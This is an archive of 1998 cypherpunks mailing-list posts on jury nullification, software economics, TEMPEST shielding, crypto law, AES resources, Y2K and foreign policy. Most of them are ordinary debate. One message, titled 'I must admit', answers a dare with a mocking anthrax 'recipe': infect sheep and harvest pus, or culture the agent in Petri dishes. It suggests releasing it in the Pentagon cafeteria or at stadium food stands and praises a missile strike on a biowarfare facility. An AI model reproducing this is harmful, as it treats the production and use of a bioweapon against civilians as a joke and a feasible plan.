E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/

___________________________________________________________________ 
Get Your Email Sniffed and Decrypted for Free at http://www.nsa.gov

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBNoEMeZDw1ZsNz1IXAQEqJgf6AnDNmzgTEOpTRzjtcTdh0qpMH94HssYl
Jo+YfCjc/zcd5mEscnX+CtBrKKggODzzl5LoXiwuJ6BShJqpj8MdAZtah1PAG5NS
N6pC3/JLr0lSqGeRcRo0NiVMdizv/78wbIFMXIOWk0e9v5Dts41r9THptHkfZqmA
Zae4P63jBh/9DQtEwLwN6Vuj2gkRUZsfDPRbLeRjYzMMfosLdixZTPRbm/cY0KMD
bZhn/KyH10UeLE9YFhkIffPw/UThzcDhX2IxQjzoX1QoWDVSlqJSdN0Q07LJsRvz
pabhYr2oYq+TGc4SH3FN/qTuI0eNu1gmP2G42zemcAt43NoQwyWOFg==
=kzlM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 24 Dec 1998 00:12:29 +0800
To: Anonymous <cypherpunks@Algebra.COM
Subject: Re: Jury Duty
In-Reply-To: <199812230730.IAA17418@replay.com>
Message-ID: <199812231541.HAA17483@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



If you want to vote your conscience (if it's a drug prosecution and you
don't agree with drug laws for instance), there are a few organizations
that you might want to look at. Maybe check out http://www.cato.org/ which
last I checked had an advertisement for a new book on jury nullification
etc. on their home page.

-Declan


At 08:30 AM 12-23-98 +0100, Anonymous wrote:
>In 22 years of being qualified, I am facing my first jury duty summons as
a regular employee and see no way out except to report. The old
self-employment, financial burden exemption no longer applies.
>
>Is there a good web site where I can find other legal means to recuse
myself (I live in AZ), or if I do
>decide to report and get on a trial, a web site on my rights to vote my
conscious, aka jury nullification?
>
>The other option is to just lie, it says the penalty is that of perjury
and it seems we shall
>soon have case law that perjury is no longer a crime.
>
>Not a facetious post, I have seen posts here on this before, but never
really paid attention because it didn't affect me. 
>
>If no answers, I will resort to a search engine. But I thought this letter
would get me better
>quality advice.
>
>Thanks
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 24 Dec 1998 04:04:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Jury Duty
In-Reply-To: <199812230730.IAA17418@replay.com>
Message-ID: <Pine.BSF.4.02.9812231106290.10028-100000@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 23 Dec 1998, Anonymous wrote:

> Is there a good web site where I can find other legal means to recuse myself (I live in AZ), or if I do
> decide to report and get on a trial, a web site on my rights to vote my conscious, aka jury nullification?

If you really do want to avoid jury service, mentioning FIJA or jury
nullification ought to do the trick - it may get every juror within
earshot excused, too, depending on how paranoid the locals are. 

But I think that's a horrible idea - jury participation is an opportunity
to exercise much more influence than you wield if/when you vote in an
election. All by yourself, voting your conscience as shaped by the
evidence and the jury instructions, you can force a mistrial, which might
or might not mean the end of the case. If your view of the evidence and
your understanding of the law, as explained by the judge in the jury
instructions, proves to be persuasive to your fellow jurors, you will
collectively make the law as it applies to the parties in your trial. It's
pretty difficult to overturn a jury verdict - not impossible, but it's
harder than you might think from watching TV.

Jury duty is, correctly understood, yet another of the "checks and
balances" of the US legal system - if the legislators and judges are doing
things with the law that the citizens don't like, don't support, or even
just don't understand, it's an opportunity for those citizens to
peacefully change the situation. Unfortunately, the jury duty process
tends to select against people with the backbone to think for themselves;
and people with backbone and strong principles often self-select away from
jury service, because the bureacratic mechansims which surround it are
confusing, annonying, and sometimes humiliating. If you can look
beyond/around that, it's an opportunity to participate in the distributed
creation of law and justice, which is a pretty big deal.

Cypherpunks serve on juries?

--
Greg Broiles
gbroiles@netbox.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 24 Dec 1998 02:20:14 +0800
To: Digital Bearer Settlement List <cryptography@c2.net
Subject: Re: dbts: Georecursive Auctions (was Re: Friedman (The Younger) Sings...)
In-Reply-To: <v04020a1eb2a4698f1e10@[139.167.130.249]>
Message-ID: <v0401170eb2a6c55cbebe@[207.138.127.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:42 PM -0500 12/21/98, Robert Hettinga wrote:
>Sure, Red Hat grosses $20 million, but that's more a function of the
>cost-domination of sneaker-netted CDROM over the still-scrawny lower
>capillaries of the internet. More to the point, I claim, it's the result of
>the cost of *credit-cards*, even *checks*, as a way to pay for code.
>Book-entry settlement, in other words, which is done "out of band", over
>private, hierarchical, and proprietary financial transaction networks.

	Redhat makes it's money for 4 reasons, and only the first 2 will go
way in the cryptoanarchic geodesic encrypted internetworked micromoney
market place of the future:

	(1) Redhat [debian, slackware, S.u.s.e (the best dist. IMO)]
contribute back to the Linux/Open Software community, and "We" pay them
back by buying their software.
	(2) As noted above, the last mile pipes to the cloud are still small.
	(3) How much of Redhats profit is in support contracts? Lots of
small to medium sized companies are starting to use Linux, and they like to
buy support, even if it is useless and rarely used. This one will go away
in the above cryptoanarchic geodesic encrypted internetworked micromoney
market place of the future because one will be able to purchase specific
consulting time from a wide variety of sources.

	--and--

>If it were possible to pay to download code, as you needed it, for
>instantaneously net-settled *cash*, and for sufficiently small enough bits of
>money, then the need, the price-economy, if you will, for large glops of code
>would go away.

	This is why I purchased a copy of RedHat (and later SUSE, Redhat
sucks):

	(4) Being able to grab code as you need it is all well and good,
but what do you do when the machine that ties you into the network fails?
When you need to get that machine back up +now+. Yes, you can burn your own
CD (or DVDrom, or whatever), but Media burners are more expensive than
readers, and not every one can afford them.

	The network can't help when you can't reach it.

>Finally, it even behoves huge companies who control large blocks of
>intellectual property, record companies, and Microsoft, for instance, :-), to
>compete in this new kind of market, precisely *because* the the transaction
>costs are so low and the initial profit margins are correspondingly higher.

	The problem with your line of thought is that in the cryptoanarchic
geodesic encrypted internetworked micromoney market place of the future,
the difference between "old" information (code) and "new" information
(code) in MARKET terms can be minutes or less, while it takes weeks to turn
out good new code.

	Why should _anyone_ buy at a higher price when one can watch the
value fall faster than gravity should allow?

	Yes, someone will make the _first_ buy, but that will be the last
buy at anywhere near that price, and that is going to force the developer
to reduce his costs etc.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 24 Dec 1998 04:58:30 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <Pine.LNX.3.96.981223003628.24980B-100000@albert>
Message-ID: <3.0.5.32.19981223120228.009bf320@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:39 AM 12/23/98 -0600, Igor Chudov @ home wrote:
>Just curious, if a computer is connected to the electric power through a UPS,
>does that reduce emissions leaked into the electrical system?:wq

It should probably reduce them a bit, depending on your UPS design,
but if you have to worry about people monitoring your electricity
for contraband bits, you've got a whole raft of other things
you'd better start taking care of, like disk encryption and
offsite backups and signs on the door indicating that you
will or will not shoot at police if they do or do not have warrants....

The converse is that if you've got an electrical filtering system
as part of your TEMPEST protection, whether it's in your computer's
power supply or separate or both, you tend to have really nice
clean power feeding your computer, which is a Good Thing.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 24 Dec 1998 04:58:43 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury Duty
In-Reply-To: <199812230730.IAA17418@replay.com>
Message-ID: <3.0.5.32.19981223122641.009c49f0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:30 AM 12/23/98 +0100, Some Anonymous Replay User wrote:
>In 22 years of being qualified, I am facing my first jury duty summons as a 
>regular employee and see no way out except to report. 
>The old self-employment, financial burden exemption no longer applies.
>
>Is there a good web site where I can find other legal means to recuse myself
>(I live in AZ), or if I do decide to report and get on a trial, 
>a web site on my rights to vote my conscious, aka jury nullification?

The Fully Informed Jury Association web page is http://www.fija.org/fija .
They've been the primary organization promoting Jury Nullification issues
for the last N years, and there's some good material there.

The question I'd ask is why you _want_ to get off jury duty.
Just to avoid wasting your time?  Don't like courts or the current laws?
Don't like having to judge other people?  Generally cantakerous? :-)  

If the problem is wasting your time, how much time gets wasted
depends a lot on your county.  Most counties call far more people
than they need to be potential jurors, just in case they need them,
and take different approaches for winnowing down to the numbers
they actually need for real cases.  The place I live now makes you
call a recorded message every night to see if your number's come up.
On the other hand, a county I used to live in made you show up
in person for the first four days whether you were needed or not,
and this was before laptop computers so I couldn't do much work there.
Another county I lived near makes the lawyers all show up Monday,
and takes care of all the jury selection that day.

On the other hand, if you are picked, and the trial is expected
to take a long time, the voir dire process generally includes
asking if this is going to cause a major hardship,
which is why juries on those cases are usually made up of
retired schoolteachers, retired military, and postal workers.
But most county jury trials seem to be civil cases, like car accidents
and such, which are usually pretty quick.

For criminal cases, the job of the jury has always been to judge
the law and its applicability as well as the facts of the case,
regardless of what the judge and prosecutor tell you
(though the judge's instructions on the law usually are
relatively good advice.)  If you think the law's bad,
like drug laws, or being applied unfairly in the case at hand,
or that the penalties are way out of line for the crime,
you can vote not guilty, and you can try to convince your
fellow jurors to do the same.  Your duty is to vote your conscience.

Alternatively, if you really want to get out of jury duty anyway,
handing out FIJA literature in the jury pool waiting room
and discussing the issues with your fellow potential jurors
should either get you thrown out quickly, because they don't
want your subversive kind around, and similarly,
if you get as far as the jury selection process,
being an intelligent and opinionated type often makes
you an undesirable juror in either civil or criminal cases,
so they may still reject you.  

But if you're the political activist type, rather than just 
trying to get out of jury duty, you can get stuck on some 
automobile accident or dog bite lawsuit 
where there's basically no FIJA issue at all and you're just
deciding who's 65% at fault and how much pain and suffering
their whiplash really caused :-)


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Thu, 24 Dec 1998 03:04:59 +0800
To: cypherpunks@Algebra.COM
Subject: Koop's Crypto Law Survey updated - v. 14.1 (FW)
Message-ID: <v04003a03b2a6de5b2e44@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain



From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Organization: Tilburg University
Date: Wed, 23 Dec 1998 16:04:37 MET
Subject: Crypto Law Survey updated - version 14.1


I have updated my Crypto Law Survey to version 14.1.
http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm

INTERNATIONAL
Wassenaar Arrangement (December 1998 changes)

ASIA & PACIFIC
China (no use restrictions)
Indonesia (use restrictions?)
Kyrgyzstan (no export controls)
Vietnam (import controls)

EUROPE
EU (to implement Wassenaar changes?)
Poland (free GSN import)
Slovenia (no domestic controls)
Spain (Telecoms Law may forebode key recovery)

NORTH AND SOUTH AMERICA
Chile (no controls)
Colombia (no controls)
Costa Rica (no domestic controls)
Mexico (no use restrictions)
Puerto Rico (no controls)
United States (new export relaxations; Junger dismissed; TACDFIPSFKMI
charter extended; copyright act may hinder crypto research)
Uruguay (no controls)

Please note that the UK entry still needs updating.

Bert-Jaap Koops
Tilburg University
23 December 1998

--------------------------
You may forward this message, in its entirety, without permission.
.--------------------------
To unsubscribe from this mailing list, send a message to
<e.j.koops@kub.nl> with subject "unsubscribe cls-update".
.

-----
"Cryptography is like literacy in the Dark Ages. Infinitely potent, for
good and ill... yet basically an intellectual construct, an idea, which by
its nature will resist efforts to restrict it to bureaucrats and others who
deem only themselves worthy of such Privilege."
_ A Thinking Man's Creed for Crypto  _vbm.

 *     Vin McLellan + The Privacy Guild + <vin@shore.net>    *
      53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 24 Dec 1998 04:07:34 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury Duty
In-Reply-To: <199812230730.IAA17418@replay.com>
Message-ID: <v04011710b2a6e74fb888@[207.138.127.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:30 AM -0500 12/23/98, Anonymous wrote:
>In 22 years of being qualified, I am facing my first jury duty summons as
>a regular employee and see no way out except to report. The old
>self-employment, financial burden exemption no longer applies.
>
>Is there a good web site where I can find other legal means to recuse
>myself (I live in AZ), or if I do
>decide to report and get on a trial, a web site on my rights to vote my
>conscious, aka jury nullification?
>
>The other option is to just lie, it says the penalty is that of perjury
>and it seems we shall
>soon have case law that perjury is no longer a crime.
>
>Not a facetious post, I have seen posts here on this before, but never
>really paid attention because it didn't affect me.

	Don't bother, take a book (say Crime & Punishment, or John Lott's
"More Guns, Less Crime, anything hard bound should do). State your opnions
on capital punishment, and on "victimless crime" & drug crimes. Mention
Jury Nullification, and you should be back on the street in an hour.

	Or, you can do your civic duty, get on the jury and do your best to
do what is right.

	I'd suggest the latter.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 24 Dec 1998 04:07:27 +0800
To: Vin McLellan <cypherpunks@Algebra.COM
Subject: Re: Koop's Crypto Law Survey updated - v. 14.1 (FW)
In-Reply-To: <v04003a03b2a6de5b2e44@[198.115.179.81]>
Message-ID: <v04011711b2a6e88c02f6@[207.138.127.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:02 PM -0500 12/23/98, Vin McLellan wrote:
>From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
>Organization: Tilburg University
>Date: Wed, 23 Dec 1998 16:04:37 MET
>Subject: Crypto Law Survey updated - version 14.1
>
>
>I have updated my Crypto Law Survey to version 14.1.
>http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm
>
>INTERNATIONAL
>Wassenaar Arrangement (December 1998 changes)
>
>ASIA & PACIFIC
>China (no use restrictions)

	I think this should read "No written legal restrictions" as the
government there seems to change ANY speech related restrictions on a whim.

	Bloody facists.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "jim finder" <jim_finder@hotmail.com>
Date: Thu, 24 Dec 1998 04:26:54 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Good archive of AES algorithms?
Message-ID: <199812232000.MAA22429@law-f115.hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
>> Thanks to everyone who responded to me on the AES
>> archive. Most people pointed me to the counterpane.com
>> web site, which is very nice and well done, and answers
>> most of my questions. Unfortunately, though, Counterpane
>> itself is one of the candidates, so the site may not
>> exactly be unbiased. Is there any site with a similar scope
>> being run by a disinterested party?
>
>Apparently you did not see the post which directed you to
>http://www.nist.gov/aes/.  This is the home page for the AES.  It has
>links to independent analyses of the algorithms, as well as performance
>information.  From that page we find:
>
>Block Cipher Lounge
>        http://www.ii.uib.no/~larsr/aes.html
>cAESar Project
>        http://www.dice.ucl.ac.be/crypto/CAESAR/caesar.html
>Efficiency Testing Table
>        http://home.cyber.ee/helger/aes
>Efficiency Testing Results
>        http://www.seven77.demon.co.uk/aes.htm
>Analysis from Louis Granboulan
>        http://www.dmi.ens.fr/~granboul/recherche/AES.html
>NIST's preliminary efficiency testing results
>        http://csrc.nist.gov/encryption/aes/round1/nistefficiency1.pdf

Ah, I was so put off by the big brother process for
requsting a CD that I missed those links. Thanks!

Jim



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <s1180@qmail.pjwstk.waw.pl>
Date: Wed, 23 Dec 1998 22:17:58 +0800
To: cypherpunks@cyberpass.net
Subject: Polish Telecommunications
Message-ID: <3680ED67.4603C835@qmail.pjwstk.waw.pl>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Polish Telecommunications [Telekomunikacja Polska, TP S.A..]

I went to Polish Telecommunications on the 21/12/1998 
[na ul. Zamenhoffa w Warszawie - on Zamenhoff St. in Warsaw] 
and inquired what was being done about the Millennium Bug. 
What I got from a medium important chief was that there was an 
article not long ago about it, the name of the journal escapes me. 
She seemed pretty angry that I even asked about it. What made 
me angry was that she didn't know what was the bloody problem. 
Total ignorance. But I guess Polish Telecommunications are 
going to get a kick out it when the year 2000 finally does arrive.

Later,
Jan Dobrucki a.k.a. jdo


-----BEGIN PGP SIGNATURE-----
Version: PGP Cyber-Knights Templar build 5.5.3ckt
Comment: "Information is Ammunition"
Comment: KeyID: 0x49281659
Comment: Fingerprint: F220 3529 2B65 FA9C  F4DF 5F02 11ED D8BB

iQEVAwUBNn+aCGiR2plJKBZZAQH3twf7BohEfDHGV+mpMILXcY9xGg3E7ZQJrYIz
rLqVDFXwBjmxu+dyGetY05fsUSZRM/uWLpUcyY8rnIoQ/EngXfycrQ8iIHrUVQxD
Jtbfd7JDV1h3XzM0s90LINTvVlCtHCcWTpjzqsOpkMKHiA9NjdpWO+lKphgekHAH
gB15//qPDdtjOv9f4uzs1wonaGWU+sco8EZozGgO3NDZ3qW/rUtl+TmnmvnLXpFi
xPgaZnozQajAO/Bls7SH7oT9BJSEV4+JMUQmNRi61BolOvFE1Io2MUpBjHuCOCii
bHIX+9r3yAfJv+LmVgV61dSIWZIi3npo2yMD72nFtQFTwDrB+cLjTg==
=7cUG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Thu, 24 Dec 1998 05:05:03 +0800
To: bill.stewart@pobox.com (Bill Stewart)
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <3.0.5.32.19981223120228.009bf320@idiom.com>
Message-ID: <199812232032.OAA03464@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Bill Stewart wrote:
> 
> At 09:39 AM 12/23/98 -0600, Igor Chudov @ home wrote:
> >Just curious, if a computer is connected to the electric power through a UPS,
> >does that reduce emissions leaked into the electrical system?:wq
> 
> It should probably reduce them a bit, depending on your UPS design,
> but if you have to worry about people monitoring your electricity
> for contraband bits, you've got a whole raft of other things
> you'd better start taking care of, like disk encryption and

Very true. I thought about this too. The question that I ask is, 
how much $$ am I worth to whoever might want to snoop at me? And
then I spend money/time (my time is freely convertible to money)
accordingly.

> offsite backups and signs on the door indicating that you
> will or will not shoot at police if they do or do not have warrants....

Well, I personally hate these signs, they are very unfriendly.

> The converse is that if you've got an electrical filtering system
> as part of your TEMPEST protection, whether it's in your computer's
> power supply or separate or both, you tend to have really nice
> clean power feeding your computer, which is a Good Thing.

Hmmm, nice point. 

Now... Just curious, if I simply make my study into a faraday cage via
use of fine (< 1/2 inch) chicken wire, and insulate my power system from
the computer emenations, would that be enough? Chicken wire is not that
expensive, and I think that I could make it look nice on walls.

igor

> 				Thanks! 
> 					Bill
> Bill Stewart, bill.stewart@pobox.com
> PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 24 Dec 1998 07:56:01 +0800
To: Petro <howree@cable.navy.mil>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981221234722.009bd210@205.83.192.13>
Message-ID: <3.0.5.32.19981223151921.00959c30@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:41 PM 12/22/98 -0500, Petro wrote:
>If ANTHRAX recipes are so easily obtainable, if it is so easy to make, so
>easy to disseminate, and public knowledge to boot, POST IT HERE, POST IT
>HERE.
>
>24 hour time limit, IF IT IS EASY, You shouldn't have any trouble making
>the deadline now should you? And none of that "I don't want to give away

Well, depending on time zones, I may have just missed your deadline,
but it's pretty close.  It shouldn't be that tough to do - 
get some anthrax*, and go find a flock of sheep and ask for volunteers 
willing to help their country.  Any that don't run away fast enough
will do, so herd them into pens where you can manage them.
Give them some skin cuts and dust them with your starter supply.
When they get infected enough and die, collect the pus from the wounds
and handle it carefully, preferably with gas masks and rubber gloves.
Now that you've replenished your starter supply, deposit the used sheep on the 
Pentagon's front step, light some black candles, ring the doorbell, and run.

Alternatively, if you don't like killing poor cute mammals that are
even dumber than Democrats, you can grow the stuff in Petri dishes.

More seriously, though, anthrax isn't some exotic hard-to-grow disease;
before modern sanitation and plastic brush bristles, there were at least 
occasional problems with anthrax infection in shaving brushes and
hairbrushes made with bristles from infected pigs, and training for barbers
included sterilizing brushes to prevent it.  The trick is in making sure
you don't get infected yourself, and also in manufacturing it in
military quantities and militarily-convenient delivery systems.
If all you're trying to do is smuggle it into the Pentagon cafeteria
or the Yankee Stadium hot dog stands, rather than take out a whole city
like government-employed terrorists do, it's not that tough.

A more appropriate distribution approach would be for a US-based Iraqi
to fire a Stinger missle at one of the US Army's Chemical or Biological
Warfare development facilities.  After all, the White House has announced
that blowing up weapons of mass destruction is a Good Thing....


[ *Anthrax is a naturally-occurring organism, so it's not cheating to
start the process with "get some Anthrax" rather than by synthesizing it.]


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 24 Dec 1998 08:21:48 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: DOES U.S. INTERVENTION OVERSEAS BREED TERRORISM?
In-Reply-To: <199812231958.UAA08914@replay.com>
Message-ID: <3.0.5.32.19981223155432.009555e0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



><snip from http://www.cato.org/pubs/fpbriefs/fpb-050es.html>
>According to Secretary of State Madeleine Albright, terrorism is the most
>important threat the United States and the world face as the 21st century
>begins. High-level U.S. officials have  acknowledged that terrorists are now
>more likely to be able to obtain and use nuclear, chemical, and biological
>weapons than ever before. 
><snop>
><snip>
>In fact, the interventionist foreign policy currently pursued by the United
>States is an aberration in its history. Adopting a policy of military
>restraint would return the United States to the traditional foreign policy
>it pursued for the first century and a half of its existence before the Cold
>War distorted it. Such a foreign policy is more compatible with the
>individual freedoms and economic prosperity that define the American way of
>life.
><snop>

While I agree with the need to discourage interventionist foreign policy,
and especially to keep the US from using terrorism as an excuse for further
erosions of civil liberties at home and as an excuse for maintaining
and finding new work for the increasingly-unnecessary standing army,
I have to disagree with the notion that US foreign policy was "restrained" 
for its first 150 years - it was just focused on "our" Western Hemisphere.

The first 40-50 years were primarily occupied with the British,
but also included the Louisiana Purchase and consolidation of control
and wars with the Indian Nations in that territory, plus the
"Monroe Doctrine" which said that the Western Hemisphere was the US's,
and no other colonialism could happen, though we weren't quite ready yet.

But after that, it was open season for the "Manifest Destiny" expansionists,
conquering Northern Mexico (with some Texan help), subjugating any Native 
tribes that the Mexicans hadn't done in, taking the rest of North America
between Canada and the now-smaller Mexico, including Washington and Oregon,
though they were restrained enough not to carry out "54 40' or Fight!".

During the middle of this period, there was that nasty little event,
the Reconquest of the Confederacy.  While the southern states had
seceeded primarily to protect slavery, and the US invasion was
largely driven by nationalists who wanted America to control as
much of North America as it could.

Then there was the Teddy Roosevelt conquest of Spanish Caribbean territory,
with the additional bonus of the Philipines,
and a century of intervention in places like Haiti and Nicaragua
(when did the Marines first go there?  1905?).  Much of US intervention
in Latin America was on behalf of fruit and sugar companies,
just as the conquest of the Kingdom of Hawai'i had been,
and it was only after WWII that they could blame it on Commies.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 24 Dec 1998 08:33:31 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Question about 'TEMPEST': UPS
Message-ID: <3681858B.4028@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



>
Now... Just curious, if I simply make my study into a faraday cage via
use of fine (< 1/2 inch) chicken wire, and insulate my power system from
the computer emenations, would that be enough? Chicken wire is not that
expensive, and I think that I could make it look nice on walls.
>

The cages I've used were framed in wood and had several layers of copper
screening. The mesh was like standard window screen, <.125". There were
two, I think sometimes three, layers. The corners/joints were copper
sheet. The screen was soldered to the corners. The doors were stepped or
beveled and had several sets of fingers - indside edge, outside edge,
perhaps one intermediate. Screen makes ventilation easier. Power should
be brought in through a separate, partitioned, shielded box with
filtering in each partition. Phone lines, same thing. You trust your
apps, os and TCP/IP stack to not rat you out? If not, work off-line
always.

One cage I saw had ferrite tiles on the solid walls to minimize internal
reflections which would cut down on leakage too.

Al foil if it were thick enough would be OK but how do you reliably join
edges? Al has a bad habit of oxidizing rapidly in air. I guess you could
fold edges over several times - seems tacky.

Converting your study is non-trivial. The door would look like crap. You
would need the euivalent of a door over the window. Build one in your
garage. Make it out of sections so you can move it. 6' x 8' seems about
right for a couple computers and some lab equip. Is the cost justified?

I wouldn't trust 1/2" galvanized chicken wire for containing anything
but chickens or other non-gnawing furry woodland creatures.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gawlick, Thomas" <T.Gawlick@secunet.de>
Date: Wed, 23 Dec 1998 23:58:46 +0800
To: "'cypherpunks@Algebra.COM>
Subject: First call for papers
Message-ID: <E1299C7C475BD1118FAD0000F830372E363A92@stmail01.cubis.de>
MIME-Version: 1.0
Content-Type: text/plain




Hi everyone !

Please find the attached first call for papers for a new international
forum for information security. We apologize if you have multiple
receipts of  this message.

We wish you all a joyous Holiday Season and a Happy New Year!

	secunet                             	
	Security Networks GmbH 
	CQRE - Team 




                          First CALL FOR PAPERS
                          --------------------------------------
             CQRE [Secure] Exhibition & Congress
             --------------------------------------------------------
         Nov. 30 - Dec. 2, 1999, Duesseldorf, Germany


CQRE [Secure] Exhibition & Congress provides a new international
forum giving a close-up view on information security in the context
of rapidly evolving economic processes. The unprecedented reliance
on computer technology has transformed the previous technical
side-issue "information security" to a management problem requiring
decisions of strategic importance. Hence, the targeted audience
represents decision makers from government, industry, commercial,
and academic communities.

If you are concerned with solutions relating to the protection of
your countrys information infrastructure or a commercial
enterprise, consider submitting a paper to the CQRE [Secure]
Exhibition & Congress.


We are looking for papers and panel discussions covering:

* ELECTRONIC COMMERCE            * CORPORATE SECURITY
---------------------------------------------
--------------------------------------------------
- new business processes                 - access control
- secure business transactions          - secure teleworking
- online merchandising                      - enterprise key management
- electronic payment / banking           - IT-audit
- innovative applications                     - risk / disaster
management
* NETWORK SECURITY                   - security awareness and training
---------------------------------------------          - implementation,
accreditation,
- virtual private networks                       and operation of secure
systems
- security aspects in internet                in a government, business,
or
  utilization                                         industry
environment
- security aspects in multi-               * SECURITY TECHNOLOGY
  media-applications
--------------------------------------------------
- intrusion detection systems            - cryptography
* LEGAL ASPECTS                         - public key infrastructures
------------------------------                        - chip card
technology
- digital signature acts                      - biometrics
- privacy and anonymity                   * TRUST MANAGEMENT
- crypto regulation
--------------------------------------------------
- liability                                         - evaluation of
products and systems
		                                         - international
harmonization of
              			        security evaluation criteria
                                                     * STANDARDIZATION
                                                     * FUTURE
PERSPECTIVES

Any other contribution addressing the involving of IT security in
economic processes will also be welcome. Authors are invited to
submit an extended abstract of their contribution to the program
chair. The submissions should be original research results, survey
articles or "high quality" case studies and position papers.
Product advertisements are welcome for presentation, but will not
be considered for the proceedings. Manuscripts must be in English,
and not more than 2.000 words. The extended abstracts should be in
a form suitable for anonymous review, without author's names,
affiliations, acknowledgements or obvious references. Contributions
must not be submitted in parallel to any conference or workshop
that has proceedings. Separately, an abstract of the paper with no
more than 200 words and with title, name and addresses (incl. an
E-mail address) of the authors may be submitted. In case of
multiple authors the contacting author must be clearly identified.
We strongly encourage electronic submission in Postscript format.
The submissions must be in 11pt format, use standard fonts or
include the necessary fonts. Proposals for panel discussions should
also be sent to the program chair. Panels of interest include those
that present alternative/controversial viewpoints or those that
encourage lively discussions of relevant issues. Panels that are
collections of unrefereed papers will not be considered. Panel
proposals should be a minimum of one page describing the subject
matter, the appropriateness of the panel for this conference and
should identify participants and their respective viewpoints.

MAILING LIST:
--------------------------------------
If you want to receive emails with subsequent Call for Papers and
registration information, please send a brief mail to cqre@secunet.de.

